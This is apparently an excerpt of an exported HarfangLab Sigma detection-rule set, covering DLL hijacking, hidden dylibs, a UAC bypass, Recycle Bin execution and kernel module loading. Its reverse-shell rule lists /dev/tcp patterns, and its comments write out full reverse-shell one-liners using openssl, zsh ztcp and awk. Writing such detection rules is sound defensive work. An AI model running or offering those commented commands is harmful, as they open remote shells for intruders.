ProcessOriginalFileName: 'diskpart.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03d8eca6-3f1e-4d11-b989-2c6762458061",
"rule_name": "DLL Hijacking via diskpart.exe",
"rule_description": "Detects potential Windows DLL Hijacking via diskpart.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092994Z",
"creation_date": "2026-03-23T11:45:34.092996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093000Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_hidden_dylib_loaded.yml",
"content": "title: Hidden Dylib File Loaded\nid: 03dfe441-3d70-41a1-8a9b-9e3c68cee99b\ndescription: |\n Detects a hidden dylib library being loaded.\n Adversaries can create hidden malicious libraries to avoid raising users' suspicions.\n It is recommended to check the origin of the library to determine its legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/06/03\nmodified: 2025/11/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.LibraryLoaded\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|re: '.*\\/\\.[^\\/]*$'\n\n exclusion_grr:\n ImageLoaded:\n - '/private/var/db/oah/*/*/.Python.aot'\n - '/usr/local/lib/grr/grr_*/.Python'\n Image: '/usr/local/lib/grr/grr_*/grr'\n\n exclusion_postman:\n Image: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_var_folder:\n ImageLoaded|startswith:\n - '/private/var/folders/??/'\n - '/private/var/db/???/'\n\n exclusion_claude:\n Image|contains:\n - '/claude/versions/'\n - '/claude-code/'\n - '/extensions/anthropic.claude-code-'\n - '/Users/*/.claude/'\n ImageLoaded: '/private/tmp/.????????????????-????????.node'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b",
"rule_name": "Hidden Dylib File Loaded",
"rule_description": "Detects a hidden dylib library being loaded.\nAdversaries can create hidden malicious libraries to avoid raising users' suspicions.\nIt is recommended to check the origin of the library to determine its legitimacy.\n",
"rule_creation_date": "2024-06-03",
"rule_modified_date": "2025-11-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591378Z",
"creation_date": "2026-03-23T11:45:34.591382Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591389Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsget.yml",
"content": "title: DLL Hijacking via dsget.exe\nid: 03fc1f68-4d9c-420b-b4a5-79fae4a133ee\ndescription: |\n Detects potential Windows DLL Hijacking via dsget.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsget.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee",
"rule_name": "DLL Hijacking via dsget.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsget.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "04429fe5-8be4-4481-b930-acfc3c648434",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075966Z",
"creation_date": "2026-03-23T11:45:34.075968Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075973Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gpupdate.yml",
"content": "title: DLL Hijacking via gpupdate.exe\nid: 04429fe5-8be4-4481-b930-acfc3c648434\ndescription: |\n Detects potential Windows DLL Hijacking via gpupdate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpupdate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "04429fe5-8be4-4481-b930-acfc3c648434",
"rule_name": "DLL Hijacking via gpupdate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gpupdate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0462a933-4c70-4baa-b836-58671ae8a94b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095664Z",
"creation_date": "2026-03-23T11:45:34.095666Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095670Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://www.revshells.com/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1059_004_reverse_shell_command_line_macos.yml",
"content": "title: Reverse Shell Executed from Command-line\nid: 0462a933-4c70-4baa-b836-58671ae8a94b\ndescription: |\n Detects suspicious shell commands related to the execution of reverse shells.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/05/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n - 'sh*>*/dev/tcp/'\n - 'sh*>*/dev/udp/'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - '/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/udp/127.0.0.1/'\n\n condition: selection_command or (all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0462a933-4c70-4baa-b836-58671ae8a94b",
"rule_name": "Reverse Shell Executed from Command-line",
"rule_description": "Detects suspicious shell commands related to the execution of reverse shells.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\n",
"rule_creation_date": "2024-05-15",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0486b170-5b3c-4234-8610-a8881dfb1dbf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081276Z",
"creation_date": "2026-03-23T11:45:34.081278Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081282Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_taskkill.yml",
"content": "title: DLL Hijacking via taskkill.exe\nid: 0486b170-5b3c-4234-8610-a8881dfb1dbf\ndescription: |\n Detects potential Windows DLL Hijacking via taskkill.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'taskkill.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0486b170-5b3c-4234-8610-a8881dfb1dbf",
"rule_name": "DLL Hijacking via taskkill.exe",
"rule_description": "Detects potential Windows DLL Hijacking via taskkill.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "04b80cc3-4931-4733-9085-38663dfb2e0c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077465Z",
"creation_date": "2026-03-23T11:45:34.077467Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077472Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/"
],
"name": "t1548_002_post_uac_bypass_fodhelper.yml",
"content": "title: UAC Bypass Executed via fodhelper\nid: 04b80cc3-4931-4733-9085-38663dfb2e0c\ndescription: |\n Detects a process being spawned by fodhelper.exe.\n Fodhelper.exe has autoelevation capabilities and an integrity level of High.\n This is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n As such, it is recommended to look for other alerts related to ms-settings.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\ndate: 2020/10/12\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\fodhelper.exe'\n exclusion_werfault:\n Image:\n - '?:\\windows\\system32\\werfault.exe'\n - '?:\\windows\\syswow64\\werfault.exe'\n # c:\\windows\\system32\\werfault.exe -u -p 11444 -s 704\n CommandLine|contains: ' -u -p '\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "04b80cc3-4931-4733-9085-38663dfb2e0c",
"rule_name": "UAC Bypass Executed via fodhelper",
"rule_description": "Detects a process being spawned by fodhelper.exe.\nFodhelper.exe has autoelevation capabilities and an integrity level of High.\nThis is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nAs such, it is recommended to look for other alerts related to ms-settings.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627504Z",
"creation_date": "2026-03-23T11:45:34.627506Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627510Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1564_recycle_bin.yml",
"content": "title: Process Executed from Recycle Bin Folder\nid: 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\ndescription: |\n Detects an execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2021/07/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_managesoft:\n ParentImage: '?:\\Program Files (x86)\\ManageSoft\\Tracker\\ndtrack.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44",
"rule_name": "Process Executed from Recycle Bin Folder",
"rule_description": "Detects an execution from Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2021-07-08",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "050e879b-c3c6-421d-8fc1-c03917f620d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596684Z",
"creation_date": "2026-03-23T11:45:34.596687Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596695Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://linux.die.net/man/8/insmod",
"https://man7.org/linux/man-pages/man8/kmod.8.html",
"https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md",
"https://attack.mitre.org/techniques/T1547/006/",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1547_006_kernel_module_load_insmod.yml",
"content": "title: Kernel Module Loaded via Insmod\nid: 050e879b-c3c6-421d-8fc1-c03917f620d2\ndescription: |\n Detects the execution of insmod to load a kernel module manually.\n Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\n They extend the functionality of the kernel without the need to reboot the system.\n For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\n Adversaries may modify the kernel to automatically execute programs on system boot.\n It is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\nreferences:\n - https://linux.die.net/man/8/insmod\n - https://man7.org/linux/man-pages/man8/kmod.8.html\n - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md\n - https://attack.mitre.org/techniques/T1547/006/\n - https://attack.mitre.org/techniques/T1014/\ndate: 2023/12/15\nmodified: 2025/11/17\nauthor: 